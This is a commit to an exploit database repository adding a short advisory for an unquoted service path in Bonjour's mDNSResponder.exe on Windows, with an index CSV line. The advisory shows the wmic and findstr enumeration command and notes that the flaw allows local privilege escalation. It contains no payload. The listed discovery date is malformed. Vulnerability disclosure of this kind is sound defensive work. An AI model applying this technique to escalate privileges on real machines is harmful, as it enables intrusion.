Merge remote-tracking branch 'upstream/main'

CERTCC · Jul 17, 2024 · a916dbd · a916dbd
2 parents f4fb00b + c27f5a1
commit a916dbd
Show file tree

Hide file tree

Showing 2 changed files with 35 additions and 0 deletions.
diff --git a/exploits/windows/local/52061.txt b/exploits/windows/local/52061.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Bonjour Service - 'mDNSResponder.exe'  Unquoted Service
+Path
+# Discovery by: bios
+# Discovery Date: 2024-15-07
+# Vendor Homepage: https://developer.apple.com/bonjour/
+# Tested Version: 3,0,0,10
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Microsoft Windows 10 Home
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+Bonjour Service
+           Bonjour Service
+C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe
+                                                    Auto
+
+C:\>systeminfo
+
+Host Name:                 DESKTOP-HFBJOBG
+OS Name:                   Microsoft Windows 10 Home
+OS Version:                10.0.19045 N/A Build 19045
+
+PS C:\Program Files\Blizzard\Bonjour Service> powershell -command
+"(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion"
+>>
+3,0,0,10
+
+#Exploit:
+
+There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe) .
+This may allow an authorized local user to insert arbitrary code into the
+unquoted service path and escalate privileges.
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -39906,6 +39906,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50761,exploits/windows/local/50761.txt,"Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path",2022-02-18,SamAlucard,local,windows,,2022-02-18,2022-02-18,0,,,,,,
 35714,exploits/windows/local/35714.pl,"BlueVoda Website Builder 11 - '.bvp' Local Stack Buffer Overflow",2011-05-09,KedAns-Dz,local,windows,,2011-05-09,2015-01-07,1,,,,,,https://www.securityfocus.com/bid/47753/info
 25883,exploits/windows/local/25883.txt,"BOINC Manager (Seti@home) 7.0.64 - Field Buffer Overflow (SEH)",2013-06-02,xis_one,local,windows,,2013-06-02,2013-06-02,1,OSVDB-94099,,,,,
+52061,exploits/windows/local/52061.txt,"Bonjour Service 'mDNSResponder.exe' - Unquoted Service Path Privilege Escalation",2024-07-16,bios,local,windows,,2024-07-16,2024-07-16,0,,,,,,
 49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,,2021-05-10,2021-05-10,0,,,,,http://www.exploit-db.combootpt_demo_x64.exe,
 48078,exploits/windows/local/48078.txt,"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path",2020-02-17,boku,local,windows,,2020-02-17,2020-02-17,0,,,,,http://www.exploit-db.combootpt_demo_IA32.exe,
 49089,exploits/windows/local/49089.py,"Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)",2020-11-23,"Luis Martínez",local,windows,,2020-11-23,2020-11-23,1,,,,,,